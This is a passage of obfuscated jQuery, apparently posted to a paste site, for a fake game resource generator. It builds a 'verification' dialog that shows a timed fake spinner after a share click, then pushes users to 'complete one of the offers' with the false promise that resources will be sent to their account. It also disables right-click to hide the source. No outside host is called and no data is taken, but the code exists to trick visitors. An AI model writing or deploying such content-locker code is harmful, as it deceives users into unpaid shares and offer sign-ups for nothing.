  725. }
  726. }
  727. }
  728. }
  729. }
  730. setTimeout(_0x7bccx2e, 0)
  731. });
  732. _0x7bccx1('#verification')['load']('dialog/verification.html')['dialog']({
  733. dialogClass: 'dialog-full verification',
  734. autoOpen: false,
  735. width: '100%',
  736. maxWidth: '100%',
  737. closeOnEscape: false,
  738. resizable: false,
  739. draggable: false,
  740. modal: true,
  741. hide: 200,
  742. open: function(_0x7bccx5, _0x7bccx6) {
  743. _0x7bccx1('body')['css']('position', 'fixed');
  744. _0x7bccx1('.btn-share')['click'](function() {
  745. _0x7bccx1('.locker')['append']('<div class="locker-spin spin"></div>');
  746. setTimeout(function() {
  747. _0x7bccx1('.locker-spin, .share-buttons')['remove']();
  748. _0x7bccx1('.locker')['removeClass']('social-lock')['addClass']('offer-lock');
  749. _0x7bccx1('.step-number')['text']('2/2');
  750. _0x7bccx1('.locker-title')['text']('Good Job, Chief! Now we can complete the last step.');
  751. _0x7bccx1('.locker-note')['text']('Complete one of the offers and get your resources!');
  752. _0x7bccx1('.offer')['show']()
  753. }, 15000)
  754. });
  755. _0x7bccx1('.ui-dialog-titlebar-close')['click'](function() {
  756. _0x7bccx1('body')['css']('position', '');
  757. _0x7bccx1('#verification')['dialog']('close')
  758. })
  759. },
  760. create: function() {
  761. _0x7bccx1('.dialog-full')['append']('<div class="dialog-footer"><p>Note: The resources will be send into your account once you complete the verification!</p></div>');
  762. _0x7bccx1('.verification')['children']('.ui-dialog-titlebar')['prepend']('<div class="dialog-titlebar-step"><span class="step">Step</span><span class="step-number">1/2</span></div>')
  763. }
  764. });
  765. _0x7bccx1('#btnAbout')['click'](function() {
  766. _0x7bccx1('#about')['dialog']('open')['dialog']({
  767. dialogClass: 'about fast zoomIn'
  768. })
  769. });
  770. _0x7bccx1('#about')['load']('dialog/about.html')['dialog']({
  771. dialogClass: 'about',
  772. autoOpen: false,
  773. width: 680,
  774. closeOnEscape: false,
  775. resizable: false,
  776. draggable: false,
  777. modal: true,
  778. hide: 200,
  779. open: function(_0x7bccx5, _0x7bccx6) {
  780. _0x7bccx1('body')['css']('position', 'fixed');
  781. _0x7bccx1('.tools')['fadeTo'](0, 0.0);
  782. _0x7bccx1('.ui-widget-overlay, .ui-dialog-titlebar-close')['click'](function() {
  783. _0x7bccx1('body')['css']('position', '');
  784. _0x7bccx1('#about')['dialog']('close')['dialog']({
  785. dialogClass: 'about fast zoomOut'
  786. });
  787. _0x7bccx1('.tools')['fadeTo'](0, 1.0)
  788. })
  789. }
  790. });
  791. _0x7bccx1('#btnInstructions')['click'](function() {
  792. _0x7bccx1('#instructions')['dialog']('open')['dialog']({
  793. dialogClass: 'instructions fast zoomIn'
  794. })
  795. });
  796. _0x7bccx1('#instructions')['load']('dialog/instruction.html')['dialog']({
  797. dialogClass: 'instructions',
  798. autoOpen: false,
  799. width: 680,
  800. closeOnEscape: false,
  801. resizable: false,
  802. draggable: false,
  803. modal: true,
  804. hide: 200,
  805. open: function(_0x7bccx5, _0x7bccx6) {
  806. _0x7bccx1('body')['css']('position', 'fixed');
  807. _0x7bccx1('.tools')['fadeTo'](0, 0.0);
  808. _0x7bccx1('.ui-widget-overlay, .ui-dialog-titlebar-close')['click'](function() {
  809. _0x7bccx1('body')['css']('position', '');
  810. _0x7bccx1('#instructions')['dialog']('close')['dialog']({
  811. dialogClass: 'instructions fast zoomOut'
  812. });
  813. _0x7bccx1('.tools')['fadeTo'](0, 1.0)
  814. })
  815. }
  816. });
  817. _0x7bccx1('#btnPlayers')['click'](function() {
  818. _0x7bccx1('#players')['dialog']('open')['dialog']({
  819. dialogClass: 'players fast zoomIn'
  820. })
  821. });
  822. _0x7bccx1('#players')['load']('dialog/player.html')['dialog']({
  823. dialogClass: 'players',
  824. autoOpen: false,
  825. width: 680,
  826. closeOnEscape: false,
  827. resizable: false,
  828. draggable: false,
  829. modal: true,
  830. hide: 200,
  831. open: function(_0x7bccx5, _0x7bccx6) {
  832. _0x7bccx1('body')['css']('position', 'fixed');
  833. _0x7bccx1('.tools')['fadeTo'](0, 0.0);
  834. _0x7bccx1('.ui-widget-overlay, .ui-dialog-titlebar-close')['click'](function() {
  835. _0x7bccx1('body')['css']('position', '');
  836. _0x7bccx1('#players')['dialog']('close')['dialog']({
  837. dialogClass: 'players fast zoomOut'
  838. });
  839. _0x7bccx1('.tools')['fadeTo'](0, 1.0)
  840. })
  841. }
  842. });
  843. _0x7bccx1('#btnFaq')['click'](function() {
  844. _0x7bccx1('#faq')['dialog']('open')['dialog']({
  845. dialogClass: 'faq fast zoomIn'
  846. })
  847. });
  848. _0x7bccx1('#faq')['load']('dialog/faq.html')['dialog']({
  849. dialogClass: 'faq',
  850. autoOpen: false,
  851. width: 680,
  852. closeOnEscape: false,
  853. resizable: false,
  854. draggable: false,
  855. modal: true,
  856. hide: 200,
  857. open: function(_0x7bccx5, _0x7bccx6) {
  858. _0x7bccx1('body')['css']('position', 'fixed');
  859. _0x7bccx1('.tools')['fadeTo'](0, 0.0);
  860. _0x7bccx1('.ui-widget-overlay, .ui-dialog-titlebar-close')['click'](function() {
  861. _0x7bccx1('body')['css']('position', '');
  862. _0x7bccx1('#faq')['dialog']('close')['dialog']({
  863. dialogClass: 'faq fast zoomOut'
  864. });
  865. _0x7bccx1('.tools')['fadeTo'](0, 1.0)
  866. })
  867. }
  868. });
  869. _0x7bccx1('#btnComments')['click'](function() {
  870. _0x7bccx1('#comments')['dialog']('open')['dialog']({
  871. dialogClass: 'comments fast zoomIn'
  872. })
  873. });
  874. _0x7bccx1('#comments')['load']('dialog/comment.html')['dialog']({
  875. dialogClass: 'comments',
  876. autoOpen: false,
  877. width: 680,
  878. closeOnEscape: false,
  879. resizable: false,
  880. draggable: false,
  881. modal: true,
  882. hide: 200,
  883. open: function(_0x7bccx5, _0x7bccx6) {
  884. _0x7bccx1('body')['css']('position', 'fixed');
  885. _0x7bccx1('.tools')['fadeTo'](0, 0.0);
  886. _0x7bccx1('.ui-widget-overlay, .ui-dialog-titlebar-close')['click'](function() {
  887. _0x7bccx1('body')['css']('position', '');
  888. _0x7bccx1('#comments')['dialog']('close')['dialog']({
  889. dialogClass: 'comments fast zoomOut'
  890. });
  891. _0x7bccx1('.tools')['fadeTo'](0, 1.0)
  892. })
  893. }
  894. });
  895. _0x7bccx1['fn']['click'] = function(_0x7bccx31) {
  896. return this['each'](function() {
  897. var _0x7bccx32 = _0x7bccx1(this);
  898. _0x7bccx32['on']('vclick', _0x7bccx31)
  899. })
  900. };
  901. _0x7bccx1('button')['easyAudioEffects']({
  902. ogg: './audio/button.ogg',
  903. mp3: './audio/button.mp3',
  904. eventType: 'click',
  905. playType: 'gate'
  906. });
  907. var _0x7bccx33 = '';
  908.  
  909. function _0x7bccx34() {
  910. if (document['all']) {
  911. (_0x7bccx33);
  912. return false
  913. }
  914. }
  915.  
  916. function _0x7bccx35(_0x7bccx36) {
  917. if (document['layers'] || (document['getElementById'] && !document['all'])) {
  918. if (_0x7bccx36['which'] == 2 || _0x7bccx36['which'] == 3) {
  919. (_0x7bccx33);
  920. return false
  921. }
  922. }
  923. }
  924. if (document['layers']) {
  925. document['captureEvents'](Event.MOUSEDOWN);
  926. document['onmousedown'] = _0x7bccx35
  927. } else {
  928. document['onmouseup'] = _0x7bccx35;
  929. document['oncontextmenu'] = _0x7bccx34
  930. };
  931. document['oncontextmenu'] = new Function('return false')
  932. }(jQuery))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement